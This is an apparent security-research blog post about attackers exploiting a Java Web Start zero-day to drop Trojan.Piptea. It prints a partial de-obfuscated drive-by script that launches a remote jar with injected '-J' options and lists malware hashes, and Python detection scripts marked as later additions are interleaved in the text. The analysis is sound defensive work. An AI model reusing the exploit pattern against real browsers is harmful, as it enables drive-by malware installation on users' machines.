Who is Exploiting the Java Zero-Day?

Update: Oracle recently released an emergency patch to fix this major flaw. See details at the bottom.


The recent discovery of a 0-day design flaw in the 'Java Web Start' module has opened new avenues for malware drive-by attacks.  This flaw was disclosed by Tavis Ormandy a few days ago, and it did not take long for the bad guys to start using the proof-of-concept code for real exploitation.  I have been reading about the exploit details for the last few days, but very few details were available on the active use of this exploit.  Who is using this exploit, and to spread what?  This article is all about that, with emphasis on the post-infection stage.

Users who are interested in the inner workings of this 0-day flaw itself, can read the full disclosure here.

It all started like this… yesterday afternoon my colleague Stuart Staniford pointed me to a malicious domain hxxp:// (dead at the moment) which he believed was exploiting this 0-day flaw.  After a little analysis, I found that to be true indeed.  Here are the details of my findings.

The whois record shows that was registered around April 8th, 2010 (a day before Tavis's public disclosure).

The sequence of events after I opened from my lab was as follows:

1. hxxp://  [main exploit page]

2. hxxp:// [sub exploit page, loaded from main page]

3. hxxp://      [path to the .jar file, which further downloaded the first level malware]

4. hxxp://  [actual malware (Trojan.Piptea), windows PE binary]

5. Trojan.Piptea further dropped different pieces of malware onto the infected machine. I'll go into the malware details later on.
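The five-step chain above (exploit page, sub page, jar served from a .php path, then a Windows PE) leaves a distinctive footprint in web proxy logs: one client fetches a Java archive and, seconds later, an executable. The following is an added example, not code from the original post or from FireEye; the log format, the client addresses and the host names are constructed placeholders, and only the "50035/C0.php" path is taken from the post. It keys on the response Content-Type rather than the URL extension, because the jar in this chain was served from a .php path and an extension-based filter would miss it.

```python
"""Correlate jar-then-PE download pairs per client in constructed proxy logs.

Added example (not from the original post). Log format assumed:
  <ISO timestamp> <client-ip> <method> <url> <status> <content-type>
Replace parse_line() to fit a real proxy's format.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (hosts are placeholders, not real IoCs).
SAMPLE_LOG = """\
2010-04-14T15:02:01 10.0.0.5 GET http://example-bad.invalid/index.php 200 text/html
2010-04-14T15:02:02 10.0.0.5 GET http://example-bad.invalid/value3.php 200 text/html
2010-04-14T15:02:03 10.0.0.5 GET http://example-bad.invalid/50035/C0.php 200 application/java-archive
2010-04-14T15:02:06 10.0.0.5 GET http://example-bad.invalid/50035/load.php 200 application/octet-stream
2010-04-14T15:05:10 10.0.0.9 GET http://intranet.example.invalid/app/launch.jnlp 200 application/x-java-jnlp-file
2010-04-14T15:05:11 10.0.0.9 GET http://intranet.example.invalid/app/lib/app.jar 200 application/java-archive
2010-04-14T16:40:00 10.0.0.9 GET http://downloads.example.invalid/setup.exe 200 application/octet-stream
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) "
    r"(?P<status>\d{3}) (?P<ctype>\S+)$"
)
JAR_TYPES = {"application/java-archive", "application/x-java-archive"}
PE_TYPES = {"application/octet-stream", "application/x-msdownload", "application/x-dosexec"}
WINDOW = timedelta(seconds=60)   # how soon after the jar the PE must arrive


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    return ev


def is_jar(ev):
    # Content-Type first: the jar in this chain was served from a .php path.
    return ev["ctype"] in JAR_TYPES or ev["url"].lower().endswith(".jar")


def is_pe(ev):
    return ev["ctype"] in PE_TYPES or ev["url"].lower().endswith(".exe")


def find_chains(log_text, window=WINDOW):
    """Return (client, jar_url, pe_url, seconds) for each client that fetched
    a Java archive followed by an executable within `window`."""
    by_client = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and ev["status"] == "200":
            by_client[ev["client"]].append(ev)

    hits = []
    for client, events in by_client.items():
        events.sort(key=lambda e: e["ts"])
        for i, ev in enumerate(events):
            if not is_jar(ev):
                continue
            for later in events[i + 1:]:
                gap = later["ts"] - ev["ts"]
                if gap > window:
                    break          # events are sorted; nothing later qualifies
                if is_pe(later):
                    hits.append((client, ev["url"], later["url"], int(gap.total_seconds())))
                    break
    return hits


if __name__ == "__main__":
    for hit in find_chains(SAMPLE_LOG):
        print("jar-then-PE chain:", hit)
```

On the constructed input only client 10.0.0.5 is reported: 10.0.0.9 also downloads a jar, but its executable download comes an hour and a half later, outside the window, which is the kind of ordinary activity the time bound is there to exclude.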


The main exploit page was highly obfuscated and looked like this:


This script, after de-obfuscation, would look like this:


As we can see above, the main script further loads hxxp:// After de-obfuscating the contents of value3.php, it looks like this (thanks to Julia Wolf for de-obfuscating it real quick):

var u = "http: -J-jar -J\\\\\\50035\\C0.php
if (window.navigator.appName == "Microsoft Internet Explorer") {
        var o =
        o.classid = "clsid:CAFEEFAC-
        o.launch(u); }
else {
        var o =
        var n = document.createElement ("OBJECT");
        o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
        n.type = "application/java-deployment-toolkit";
        document.body.appendChild(o);
        document.body.appendChild (n);
        try {o.launch(u); } catch (e) {n.launch(u);



As we can see, the value3.php script in plain text looks very similar to the proof of concept code written by Tavis.

Successful execution of this script on a vulnerable system would execute "/50035/C0.php", a jar file (a self-contained Java executable), which would further open the gates for all types of badness.
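The three signals a defender can key on in pages like value3.php are all visible in the fragment above: the Java Deployment Toolkit is instantiated (by its MIME types, or by its classid, whose "CAFEEFAC-" prefix is all the page shows), its launch() method is called, and the launch argument carries "-J" launcher options (here "-J-jar") that a legitimate Web Start page, which passes a plain .jnlp URL, never needs. The following is an added example, not code from the original post or from FireEye; the two sample pages are constructed with placeholder hosts, and the regular expressions are my own.

```python
"""Flag HTML/JS that drives the Java Deployment Toolkit with injected -J options.

Added example (not from the original post). Matching rules and samples are
constructed; hosts are placeholders.
"""
import re

# Markers as they appear in the de-obfuscated value3.php above. The classid
# is matched on its "CAFEEFAC-" prefix only, which is all the page shows.
TOOLKIT_MARKERS = (
    "application/npruntime-scriptable-plugin;deploymenttoolkit",
    "application/java-deployment-toolkit",
    "clsid:cafeefac-",
)
# "-J" launcher options: "-J-jar", "-J-Xmx..." or "-J\\" (a UNC path).
# A legitimate launcher page passes a bare .jnlp URL and has no use for these.
J_OPTION_RE = re.compile(r"-J(?:-[A-Za-z]+|\\\\)")


def scan_page(text):
    """Return the individual signals plus a verdict; "suspicious" is set only
    when toolkit instantiation, a launch() call and -J options all appear."""
    # Strip all whitespace first so split tokens such as "deployment- toolkit"
    # and "appendChild (n)" still match.
    norm = re.sub(r"\s+", "", text).lower()
    markers = [m for m in TOOLKIT_MARKERS if m in norm]
    has_launch = ".launch(" in norm
    j_opts = J_OPTION_RE.findall(text)
    return {
        "toolkit_markers": markers,
        "launch_call": has_launch,
        "j_options": j_opts,
        "suspicious": bool(markers) and has_launch and bool(j_opts),
    }


# Constructed samples. MALICIOUS mirrors the shape of the fragment above with
# placeholder hosts; BENIGN is what an ordinary Java Web Start launcher page does.
MALICIOUS = r'''
var u = "http://example-bad.invalid/app.jnlp -J-jar -J\\\\example-bad.invalid\\share\\C0.php";
var o = document.createElement("OBJECT");
o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
document.body.appendChild(o);
o.launch(u);
'''
BENIGN = r'''
var o = document.createElement("OBJECT");
o.type = "application/java-deployment-toolkit";
document.body.appendChild(o);
o.launch("http://intranet.example.invalid/app/launch.jnlp");
'''

if __name__ == "__main__":
    for name, sample in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(name, scan_page(sample))
```

Requiring all three signals keeps the benign launcher page, which legitimately uses the toolkit and calls launch(), from being flagged; the "-J" options in the launch string are the part that has no honest use.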

The jar file after de-compilation looks like this:


It's clearly visible from the code that this jar file downloads and executes Trojan.Piptea from the URL hxxp://  Trojan.Piptea is a powerful malware downloader and part of a very big pay-per-install network.  In a sample run inside my virtual machine, Piptea dropped more than 6 different pieces of malware on the infected system.  I am pretty sure the authors of these 6 malware samples paid good money to the Piptea guys for dropping their creations across the Piptea zombie base.

The MD5s of these malware samples are:

0A557F250F96F31127AE3CB79B137D6E - Trojan.Piptea
a370bfa39a4ebcef8b5e3ffb4cfcd594 -
e578a329bb6fcbafe8ec342eba3221e0 -
50c16385c80b65a5f41808a1e795638b -
f11ad564e29714149314489baceed9da -
7cee3e1bf4e48dc0d70e93aa30f93e27 - Trojan.Fakerean
27B2A4F2D3DDF2A3187C324163EB9950 - Trojan.Piptea (Update)
d9965ca03c53e4f5de232a81e415a537 - Trojan.Ertfor
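A practical use of the hash list above is a sweep of a suspect machine's filesystem for any of these samples. The following is an added example, not code from the original post or from FireEye: the hash-to-family map is copied from the list above (the entries the post left unnamed are labelled as such), while the directory layout and the sample file used in the demonstration are constructed.

```python
"""Sweep a directory tree for files whose MD5 matches the IoCs listed above.

Added example (not from the original post). Hash values come from the post;
the demo directory and its files are constructed.
"""
import hashlib
import os
import tempfile

# Hash -> family, from the list above; unnamed entries are marked as such.
PIPTEA_IOCS = {
    "0a557f250f96f31127ae3cb79b137d6e": "Trojan.Piptea",
    "a370bfa39a4ebcef8b5e3ffb4cfcd594": "unnamed (dropped by Piptea)",
    "e578a329bb6fcbafe8ec342eba3221e0": "unnamed (dropped by Piptea)",
    "50c16385c80b65a5f41808a1e795638b": "unnamed (dropped by Piptea)",
    "f11ad564e29714149314489baceed9da": "unnamed (dropped by Piptea)",
    "7cee3e1bf4e48dc0d70e93aa30f93e27": "Trojan.Fakerean",
    "27b2a4f2d3ddf2a3187c324163eb9950": "Trojan.Piptea (Update)",
    "d9965ca03c53e4f5de232a81e415a537": "Trojan.Ertfor",
}


def md5_of(path, chunk=1 << 16):
    """Hex MD5 of a file, read in chunks so large files do not load into memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep(root, iocs=PIPTEA_IOCS):
    """Return {path: family} for every regular file under root whose MD5 is in iocs."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                digest = md5_of(path)
            except OSError:
                continue            # unreadable or vanished file: skip, keep sweeping
            if digest in iocs:
                hits[path] = iocs[digest]
    return hits


def sweep_demo():
    """Build a throwaway directory with one constructed marker file, register
    its MD5 as an extra IoC, and return the families found keyed by file name."""
    with tempfile.TemporaryDirectory() as root:
        marker = os.path.join(root, "sample.bin")
        with open(marker, "wb") as f:
            f.write(b"constructed sample, not real malware\n")
        with open(os.path.join(root, "clean.txt"), "w") as f:
            f.write("nothing to see here\n")
        iocs = dict(PIPTEA_IOCS)
        iocs[md5_of(marker)] = "constructed-test-sample"
        return {os.path.basename(p): fam for p, fam in sweep(root, iocs).items()}


if __name__ == "__main__":
    print(sweep_demo())
```

Run sweep() against a user profile or temp directory on a suspect host; because the real samples are not reproduced here, the demo registers a constructed file's hash so the matching path can be exercised end to end.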

Users who want to learn more about the motives behind dropping multiple malware on the infected system may read my earlier articles about BotnetWeb written back in April 2009.

Researchers from TrendMicro recently (this April) also came up with a similar concept named BotnetMap.

It's pretty obvious that the simplicity and reliability of this exploit will make it a lethal weapon for the bad guys in the coming days.  Plus, the unavailability of any working patch makes the overall picture scarier.  I am pretty sure that in the coming days this exploit will become part of underground exploit kits.  This means that even a kiddie with basic computer skills and bad intentions can start making money out of it. Today ESET mentioned in their blog that they have seen this flaw being used in a targeted attack as well.

Tavis' disclosure also mentions some workarounds for IE and Firefox users. I would urge users to apply these workarounds until a working patch becomes available.


Professional IT users may visit the following link for technical details:

If you are looking for an easy way to update your home computer, visit the following: and click on 'Free Java Download'.

Atif Mushtaq @ FireEye Malware Intelligence Lab

Detailed questions/comments: research SHIFT-2 fireeye DOT COM

3 thoughts on “Who is Exploiting the Java Zero-Day?”

  1. Nice work.
    The quoted script attempts to exploit Firefox and Chrome as well, this is done using the “o” and “n” objects

  2. This vulnerability has been silently fixed in the most recent Java update (yesterday)

  3. FYI. Looks like your research posts are having a positive effect!!
    >> Oracle Security Alert CVE-2010-0886
    This Security Alert addresses security issues CVE-2010-0886 and CVE-2010-0887, which are vulnerabilities in desktop Java running in web browsers … These vulnerabilities may be remotely exploitable without authentication, i.e., they may be exploited over a network without the need for a username and password. For a successful exploit, a user running an affected release in their browser will need to visit a malicious web page that exploits this vulnerability. Successful exploits can impact the availability, integrity, and confidentiality of the user’s system.
    Supported Products Affected
    Java SE
    • JDK and JRE 6 for Windows, Solaris, and Linux
    Java for Business
    • JDK and JRE 6 for Windows, Solaris and Linux
    Patch Availability
    Customers who use default Java installation settings that include the automatic update of Java for security and other issues will have these fixes automatically applied over the next 30 days. Customers who do not have automatic update enabled or who want to immediately apply these important fixes, as is recommended by Oracle… (SEE URL FOR FULL DETAILS)

Comments are closed.